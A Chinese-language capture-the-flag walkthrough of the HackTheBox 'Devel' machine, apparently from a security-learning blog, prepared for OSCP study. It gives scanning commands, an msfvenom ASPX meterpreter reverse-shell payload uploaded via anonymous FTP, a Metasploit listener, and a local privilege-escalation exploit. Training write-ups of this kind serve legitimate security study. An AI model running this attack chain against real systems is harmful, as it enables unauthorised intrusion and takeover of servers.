靶机信息
靶机地址:
https://app.hackthebox.com/machines/Devel
靶场: HackTheBox.com
靶机名称:Devel
难度: 简单
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:Kali 10.10.16.3
靶机:10.10.10.5
信息收集
扫描端口
扫描靶机开放的服务端口
sudo masscan -p1-65535 -e tun0 10.10.10.5
sudo nmap -sC -sV -p 21,80 10.10.10.5 -oN nmap.log
从扫描结果中看到ftp允许匿名访问,80端口使用IIS7.5提供服务,先来看看21端口
ftp 10.10.10.5
ftp中只有IIS默认文件位置应该在IIS的根目录,访问80端口同样是IIS的默认页面,可以看出IIS与FTP在同一个目录下,那就可以利用ftp上传webshell
Web渗透
使用msfvenom生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f aspx >shell.aspx
msf中设置监听
msfconsole
use exploit/multi/handler
options
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.16.3
set LPORT 4444
run
上传webshell到ftp根目录中
ftp 10.10.10.5
put shell.aspx
上传完成,访问webshell地址
http://10.10.10.5/shell.aspx
反弹成功,查看权限收集敏感信息
将后门自动迁移到稳定的进程中
run post/windows/manage/migrate
提权
background
use post/multi/recon/local_exploit_suggester
set session 1
exploit
这些都是提示可能存在的漏洞,随便找一个验证下
use exploit/windows/local/ntusermndragover
show options
set session 1
set LHOST 10.10.16.3
set LPORT 3333
run
提权成功,来找下flag
shell
cd c:users
dir
type babisdesktopuser.txt
type administratordesktoproot.txt
拿到flag,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.123 HTB:Devel(OSCP Prep)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论